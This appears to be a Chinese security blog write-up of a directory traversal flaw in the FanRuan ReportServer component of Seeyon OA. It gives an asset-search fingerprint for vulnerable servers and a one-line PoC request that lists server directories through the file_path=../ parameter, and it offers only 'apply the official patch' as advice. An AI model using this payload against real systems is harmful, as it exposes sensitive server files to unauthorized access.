致远OA 帆软组件 ReportServer 目录遍历漏洞

04212

漏洞描述

致远OA 帆软组件 ReportServer接口存在目录遍历漏洞,攻击者通过漏洞可以获取服务器敏感信息

漏洞影响

致远OA 帆软组件

网络测绘

title=”致远A8-V5协同管理软件 V6.1sp1″

漏洞复现

登录页面

证POC









/seeyonreport/ReportServer?op=fs_remote_design&cmd=design_list_file&file_path=../&currentUserName=admin&currentUserId=1&isWebReport=true














安全建议




1. 升级官方补丁包



                    

        
© 版权声明
文章版权归作者所有,未经允许请勿转载。



      
        文章版权声明
      
      1、本网站名称:Happy峰

      2、本站永久网址:https://blog.chenjiangfeng.com

      3、本站发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

	  4、本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长进行删除处理。

      5、本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。

      6、本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报

      7、根据《计算机软件保护条例》第十七条,本站所有软件请仅用于学习研究用途

    
THE END
漏洞复现
    

    
喜欢就支持一下吧
点赞12
        分享

        

            

                
                
Happy峰的头像-Happy峰钻石会员

                
            

            
W5 SOAR 安装配置-Happy峰
W5 SOAR 安装配置
W5 SOAR 安装配置
3年前 77
AC旁挂组网三层互通数据直接转发-Happy峰
AC旁挂组网三层互通数据直接转发
AC旁挂组网三层互通数据直接转发
4年前 54
华为ENSP和华三HCL(高版本)同时共存-Happy峰
华为ENSP和华三HCL(高版本)同时共存
华为ENSP和华三HCL(高版本)同时共存
3个月前 51
JumpServer未授权访问漏洞 (CVE-2023-42442)-Happy峰
JumpServer未授权访问漏洞 (CVE-2023-42442)
JumpServer未授权访问漏洞 (CVE-2023-42442)
1年前 50
redis未授权访问漏洞复现(包括环境搭建)-Happy峰
redis未授权访问漏洞复现(包括环境搭建)
redis未授权访问漏洞复现(包括环境搭建)
2年前 50
华为、H3C、锐捷三大厂商网络交换机端口聚合配置命令实例-Happy峰
华为、H3C、锐捷三大厂商网络交换机端口聚合配置命令实例
华为、H3C、锐捷三大厂商网络交换机端口聚合配置命令实例
3个月前 49

        

    
    

        
    



            

                
相关推荐

            
JumpServer未授权访问漏洞 (CVE-2023-42442)-Happy峰
JumpServer未授权访问漏洞 (CVE-2023-42442)
JumpServer未授权访问漏洞 (CVE-2023-42442)
1年前 50
redis未授权访问漏洞复现(包括环境搭建)-Happy峰
redis未授权访问漏洞复现(包括环境搭建)
redis未授权访问漏洞复现(包括环境搭建)
2年前 50
Docker未授权访问-Happy峰
Docker未授权访问
Docker未授权访问
1年前 49
(CVE-2022-23131)ZABBIX绕过 SAML SSO 身份验证-Happy峰
(CVE-2022-23131)ZABBIX绕过 SAML SSO 身份验证
(CVE-2022-23131)ZABBIX绕过 SAML SSO 身份验证
2年前 47
CVE-2021-3156本地提权漏洞复现-Happy峰
CVE-2021-3156本地提权漏洞复现
CVE-2021-3156本地提权漏洞复现
2年前 45
Log4j远程代码执行漏洞复现-Happy峰
Log4j远程代码执行漏洞复现
Log4j远程代码执行漏洞复现
2年前 45

	

		
评论			抢沙发

	


	

									

					
请登录后发表评论

					

						
											

									

									

			
    
				
    暂无评论内容
    			

		

			


        

    

    

	
作者信息
用户封面

        

            

                
                
Happy峰的头像-Happy峰钻石会员

                
            

            
【漏洞通告】Apache Struts 2远程代码执行漏洞(CVE-2024-53677)
【漏洞通告】Cleo 远程代码执行漏洞 ( CVE-2024-50623 )
一款基于Tauri+Rust的免杀马生成工具
【漏洞通告】OpenWrt Attended SysUpgrade命令注入漏洞(CVE-2024-54143)
自解压文件创建步骤
华为ENSP和华三HCL(高版本)同时共存

        

    
热榜文章
Nessus部署10.3.0-Happy峰
16人点赞
Nessus部署10.3.0
TOP1
长亭雷池WAF开源版本使用-Happy峰
长亭雷池WAF开源版本使用
1年前15人点赞
TOP2
企业FTP项目-虚拟用户访问-Happy峰
企业FTP项目-虚拟用户访问
4年前15人点赞
TOP3
JumpServer未授权访问漏洞 (CVE-2023-42442)-Happy峰
JumpServer未授权访问漏洞 (CVE-2023-42442)
1年前15人点赞
TOP4
华为ENSP和华三HCL(高版本)同时共存-Happy峰
华为ENSP和华三HCL(高版本)同时共存
3个月前15人点赞
TOP5
Linux Polkit Pkexec本地权限提升漏洞(CVE-2021-4034)-Happy峰
Linux Polkit Pkexec本地权限提升漏洞(CVE-2021-4034)
2年前14人点赞
TOP6
远程代码执行漏洞预警免杀Struts2rustApache